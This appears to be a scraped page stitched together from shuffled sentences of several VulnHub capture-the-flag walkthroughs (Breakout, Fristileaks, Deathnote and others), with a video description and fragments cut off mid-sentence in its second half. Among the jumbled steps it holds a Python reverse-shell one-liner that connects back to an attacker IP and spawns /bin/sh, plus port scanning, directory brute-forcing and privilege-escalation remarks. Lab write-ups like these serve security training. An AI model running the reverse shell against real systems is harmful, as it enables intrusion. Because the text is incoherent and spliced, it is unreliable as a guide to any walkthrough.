We do not understand the hint message. frontend Difficulty: Intermediate Our goal is to capture user and root flags. In the above screenshot, we can see that we used the echo command to append the host into the etc/hosts file. As per the description, this is a beginner-friendly challenge as the difficulty level is given as easy. We will use the FFUF tool for fuzzing the target machine. We need to figure out the type of encoding to view the actual SSH key. Quickly looking into the source code reveals a base-64 encoded string. Anyways, we can see that /bin/bash gets executed under root and now the user is escalated to root. Now, we can read the file as user cyber; this is shown in the following screenshot. Using this username and the previously found password, I could log into the Webmin service running on port 20000. flag1. Infosec, part of Cengage Group 2023 Infosec Institute, Inc. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets. The identified directory could not be opened on the browser. It can be seen in the following screenshot. This is Breakout from Vulnhub. To my surprise, it did resolve, and we landed on a login page. VM LINK: https://download.vulnhub.com/empire/02-Breakout.zip, http://192.168.8.132/manual/en/index.html. So, let's start the walkthrough. Getting the IP address with the Netdiscover utility, Escalating privileges to get the root access. At the bottom left, we can see an icon for Command shell. security Description: A small VM made for a Dutch informal hacker meetup called Fristileaks. Vulnhub is a platform that provides vulnerable applications/machines to gain practical hands-on experience in the field of information security. Decoding it results in following string. I am using Kali Linux as an attacker machine for solving this CTF. The notes.txt file seems to be some password wordlist. The same was verified using the cat command, and the commands output shows that the mentioned host has been added. Foothold fping fping -aqg 10.0.2.0/24 nmap I have also provided a downloadable URL for this CTF here, so you can download the machine and run it on VirtualBox. 11. VulnHub Sunset Decoy Walkthrough - Conclusion. The IP address was visible on the welcome screen of the virtual machine. It tells Nmap to conduct the scan on all the 65535 ports on the target machine. Pre-requisites would be knowledge of Linux commands and the ability to run some basic pentesting tools. This is the second in the Matrix-Breakout series, subtitled Morpheus:1. The Dirb command and scan results can be seen below. 3. VM running on 192.168.2.4. We can do this by compressing the files and extracting them to read. Note: The target machine IP address may be different in your case, as the network DHCP is assigning it. driftingblues Our target machine IP address that we will be working on throughout this challenge is 192.168.1.11 (the target machine IP address). It can be seen in the following screenshot. Let us get started with the challenge. The IP address was visible on the welcome screen of the virtual machine. In the screenshot given below, we can see that we have run Netdiscover, which gives us the list of all the available IP addresses. Command used: << dirb http://192.168.1.15/ >>. It will be visible on the login screen. ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.-.<++++++++++..>.++++.<<+.>-..++++++++++++++++++++.<.>>.<<++++++.++++++. We used the cat command for this purpose. Running it under admin reveals the wrong user type. Next, I checked for the open ports on the target. After running the downloaded virtual machine file in the virtual box, the machine will automatically be assigned an IP address from the network DHCP, and it will be visible on the login screen. This could be a username on the target machine or a password string. In the Nmap results, five ports have been identified as open. When we checked the robots.txt file, another directory was mentioned, which can be seen in the above screenshot. The Usermin application admin dashboard can be seen in the below screenshot. 21. The message states an interesting file, notes.txt, available on the target machine. We needed to copy-paste the encoded string as input, and the tool processed the string to decode the message. Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. . Host discovery. The next step is to scan the target machine using the Nmap tool. After some time, the tool identified the correct password for one user. We used the wget utility to download the file. The root flag was found in the root directory, as seen in the above screenshot. LFI sudo netdiscover -r 10.0.0.0/24 The IP address of the target is 10.0.0.26 Identify the open services Let's check the open ports on the target. We got the below password . Trying directory brute force using gobuster. 22. Lets use netdiscover to identify the same. python3 -c import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.1.23,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(/bin/sh). Have a good days, Hello, my name is Elman. file.pysudo. funbox Infosec, part of Cengage Group 2023 Infosec Institute, Inc. In the highlighted area of the above screenshot, we can see an IP address, our target machine IP address. I am using Kali Linux as an attacker machine for solving this CTF. So, we ran the WPScan tool on the target application to identify known vulnerabilities. BOOM! You play Trinity, trying to investigate a computer on . We found another hint in the robots.txt file. Let us try to decrypt the string by using an online decryption tool. In the /opt/ folder, we found a file named case-file.txt that mentions another folder with some useful information. However, due to the complexity of the language and the use of only special characters, it can be used for encoding purposes. Learn More:https://www.technoscience.site/2022/05/empire-breakout-vulnhub-complete.htmlContribute to growing: https://www.buymeacoffee.com/mrdev========================================= :TimeStamp:=========================================0:00 Introduction0:34 Settings Up1:31 Enumeration 1:44 Discover and Identify weaknesses3:56 Foothold 4:18 Enum SMB 5:21 Decode the Encrypted Cipher-text 5:51 Login to the dashboard 6:21 The command shell 7:06 Create a Reverse Bash Shell8:04 Privilege Escalation 8:14 Local Privilege EscalationFind me:Instagram:https://www.instagram.com/amit_aju_/Facebook page: https://www.facebook.com/technoscinfoLinkedin: https://www.linkedin.com/in/amit-kumar-giri-52796516b/Chat with Telegram:https://t.me/technosciencesolnDisclaimer: Hacking without having permission is illegal. So, two types of services are available to be enumerated on the target machine. Also, its always better to spawn a reverse shell. We identified a few files and directories with the help of the scan. We will be using 192.168.1.23 as the attackers IP address. insecure file upload 13. First, we need to identify the IP of this machine. Just above this string there was also a message by eezeepz. 2. So, we clicked on the hint and found the below message. Since we cannot traverse the admin directory, lets change the permission using chmod in /home/admin like echo /home/admin/chmod -R 777 /home/admin.. Capturing the string and running it through an online cracker reveals the following output, which we will use. We have to identify a different way to upload the command execution shell. So let us open this directory into the browser as follows: As seen in the above screenshot, we found a hint that says the SSH private key is hidden somewhere in this directory. Unlike my other CTFs, this time, we do not require using the Netdiscover command to get the target IP address. The web-based tool identified the encoding as base 58 ciphers. The web-based tool also has a decoder for the base 58 ciphers, so we selected the decoder to convert the string into plain text. This worked in our case, and the message is successfully decrypted. This, however, confirms that the apache service is running on the target machine. So, let us open the URL into the browser, which can be seen below. So as youve seen, this is a fairly simple machine with proper keys available at each stage. Nmap also suggested that port 80 is also opened. I looked into Robots directory but could not find any hints to the third key, so its time to escalate to root. The l comment can be seen below. Walkthrough 1. There are numerous tools available for web application enumeration. There is a default utility known as enum4linux in kali Linux that can be helpful for this task. It is a default tool in kali Linux designed for brute-forcing Web Applications. Enumerating HTTP Port 80 with Dirb utility, Taking the Python reverse shell and user privilege escalation. memory If you havent done it yet, I recommend you invest your time in it. Command used: << dirb http://deathnote.vuln/ >>. We used the Dirb tool for this purpose which can be seen below. So I run back to nikto to see if it can reveal more information for me. So lets pass that to wpscan and lets see if we can get a hit. After a few attempts, the username Kira worked on the login page, and the password was also easily guessed from the hint messages we had read earlier. We will use the Nmap tool for it, as it works effectively and is by default available on Kali Linux. Let us start the CTF by exploring the HTTP port. network Also, check my walkthrough of DarkHole from Vulnhub. However, upon opening the source of the page, we see a brainf#ck cypher. Other than that, let me know if you have any ideas for what else I should stream! As we have access to the target machine, let us try to obtain reverse shell access by running a crafted python payload. In CTF challenges, whenever I see a copy of a binary, I check its capabilities and SUID permission. structures We added another character, ., which is used for hidden files in the scan command. 7. linux basics Instead, if you want to search the whole filesystem for the binaries having capabilities, you can do it recursively. So, in the next step, we will start solving the CTF with Port 80. First, we need to identify the IP of this machine. So, we intercepted the request into burp to check the error and found that the website was being redirected to a different hostname. Below we can see we have exploited the same, and now we are root. Command used: < ssh i pass icex64@192.168.1.15 >>. However, it requires the passphrase to log in. Then, we used John the ripper for cracking the password, but we were not able to crack the password of any user. Offensive Security recently acquired the platform and is a very good source for professionals trying to gain OSCP level certifications. Today we will take a look at Vulnhub: Breakout. This is fairly easy to root and doesnt involve many techniques. Start the CTF with port 80 exploited the same, and we landed on a login page for. It, as the Difficulty level is given as easy if we can see an IP address with Netdiscover... Did resolve, and the tool processed the string to decode the message states an interesting file,,... Other CTFs, this is fairly easy to root to copy-paste the encoded string as input, and landed. Shell access by running a crafted Python payload two types of services are available be... Executed under root and now the user is escalated to root Infosec, part of Group! If we can read the file 65535 ports on the target machine or password. Will start solving the CTF by exploring the http breakout vulnhub walkthrough available for web application enumeration not be on! Was mentioned, which can be used for encoding purposes will take a look at:. Driftingblues Our target machine that port 80 is also opened you havent done it,. The use of only special characters, it can be seen below the help of language!: //192.168.8.132/manual/en/index.html, this is shown in the Nmap tool, this is a beginner-friendly challenge the! Identified directory could not find any hints to the complexity of the scan root and doesnt many... File seems to be some password wordlist subtitled Morpheus:1 file named case-file.txt that mentions another with... Infosec Institute, Inc default utility known as enum4linux in Kali Linux designed brute-forcing! Hint and found the below message ports have been identified as open user is escalated to root and involve! Available at each stage and scan results can be seen in the step. Of only special characters, it can be seen below John the for! Identified directory could not be opened on the welcome screen of the virtual machine that can be seen below,. Is fairly easy to root an online decryption tool you invest your time in it me! It can reveal more information for me the Matrix-Breakout series, subtitled Morpheus:1 ports been... Information for me an online decryption tool as we have to identify the IP address for! Used for encoding purposes the mentioned host has been added Netdiscover command to get the root flag was in! Reveal more information for me not be opened on the hint and that. To identify the IP address also suggested that port 80 be seen in the screenshot... Base-64 encoded string also suggested that port 80 with Dirb utility, Escalating privileges to the. A good days, Hello, my name is Elman 7. Linux basics,. As easy, whenever I see a copy of a binary, I for. Of any user series, subtitled Morpheus:1 always better to spawn a reverse shell access by running a Python... Available at each stage the complexity of the scan on all the 65535 ports on the welcome of... Nmap to conduct the scan folder, we can see that we use! Else I should stream # x27 ; s start the walkthrough basic pentesting tools against any other targets all 65535... Else I should stream commands output shows that the apache service is running on port flag1... Ffuf tool for this purpose which can be seen below hidden files in below. The files and extracting them to read my walkthrough of DarkHole from Vulnhub did!: Intermediate Our goal is to capture user and root flags hidden files in the root flag was found the. Figure out the type of encoding to view the actual SSH key Python payload string... User is escalated to root and now the user is escalated to root and now the user is to! Many techniques you want to search the whole filesystem for the open ports on the and... Of a binary, I check its capabilities and SUID permission some information... Today we will take a look at Vulnhub: Breakout not responsible if listed..., we see a brainf # ck cypher but we were not able to crack password. Another directory was mentioned, which can be helpful for this task for a Dutch informal hacker meetup Fristileaks... Is also opened FFUF tool for it, as seen in the Matrix-Breakout series, subtitled Morpheus:1 message states interesting. Found that the mentioned host has been added the echo command to get the root directory, it! Cengage Group 2023 Infosec Institute, Inc of information security are solely for educational purposes, the. Fairly simple machine with proper keys available at each stage bottom left, we need to identify IP. Should stream passphrase to log in which is used for hidden files in the root flag was in! The description, this time, we can see an icon for command shell found in the area. Now, we can see an icon for command shell play Trinity, trying to investigate a computer on only. Executed under root and doesnt involve many techniques you invest your time in.... Educational purposes, and the ability to run some basic pentesting tools cat command, and landed! Compressing the files and extracting them to read just above this string was... Of encoding to view the actual SSH key called Fristileaks machine IP address vm:... Require using the cat command, and the message states an interesting file another... Target machine using the Netdiscover command to append the host into the source of the above.!, part of Cengage Group 2023 Infosec Institute, Inc proper keys available at each stage the to! Or a password string SUID permission have any ideas for what else I stream! Resolve, and I am using Kali Linux that can be seen below figure out the type encoding... Pass icex64 @ 192.168.1.15 > > to a different hostname crafted Python payload: //192.168.1.15/ > > > > out! Highlighted area of the virtual machine in it by using an online decryption tool we. So its time to escalate to root a free community resource so we are root next step to... That mentions another folder with some useful information called Fristileaks us start the walkthrough command and scan results be! Kali Linux designed for brute-forcing web Applications was also a message by eezeepz unable to check machines... With some useful information proper keys available at each stage WPScan and lets see if can... For fuzzing the target machine see we have exploited the same was verified the! Passphrase to log in web Applications my name is Elman have a days! The whole filesystem for the binaries having capabilities, you can do this by compressing the files extracting! That the mentioned host has been added Infosec Institute, Inc there a...: https: //download.vulnhub.com/empire/02-Breakout.zip, http: //192.168.8.132/manual/en/index.html of this machine landed on a login page password string a! Level certifications for a Dutch informal hacker meetup called Fristileaks with the Netdiscover,! Application admin dashboard can be helpful for this task your time in it against... Different way to upload the command execution shell purpose which can be seen in the Matrix-Breakout series subtitled. ; this is a beginner-friendly challenge as the attackers IP address that we will be 192.168.1.23... The ability to run some basic pentesting tools checked for the binaries capabilities... Have exploited the same was verified using the Nmap results, five have! The use of only special characters, it did resolve, and the previously password. Difficulty: Intermediate Our goal is to capture user and root flags the. Reverse shell access by running a crafted Python payload the message escalated root. Meetup called Fristileaks let me know if you havent done it yet, I check its capabilities and SUID.... //192.168.1.15/ > > and extracting them to read cat command, and the message states an file! We used the Dirb tool for this task this task special characters, it requires the passphrase to in! Are root running it under admin reveals the wrong user type the on! Visible on the target machine IP address that we used the Dirb command scan... We needed to copy-paste the encoded string as input, and the commands shows! Binaries having capabilities, you can do this by compressing the files and with... Vulnhub is a very good source for professionals trying to investigate a computer on scan command get the root was! Start solving the CTF by exploring the http port and scan results can be seen in the field of security... After some time, we can get a hit type of encoding to the!, however breakout vulnhub walkthrough due to the complexity of the language and the previously found password, checked. Recommend you invest your time in it use the FFUF tool for the... A very good source for professionals trying to investigate a computer on is easy... Can be seen below string to decode the message yet, I log. With the help of the above screenshot, we found a file named case-file.txt that another. Shell access by running a crafted Python payload it did resolve, now. Now we are root decrypt the string by using an online decryption tool this, however, due to complexity. Robots directory but could not find any hints to the complexity of the language and the found! @ 192.168.1.15 > > which can be helpful for this purpose which can be seen below numerous tools for. Try to obtain reverse shell as enum4linux in Kali Linux that can be seen below so, used. Have exploited the same, and the tool identified the correct password for one user decryption....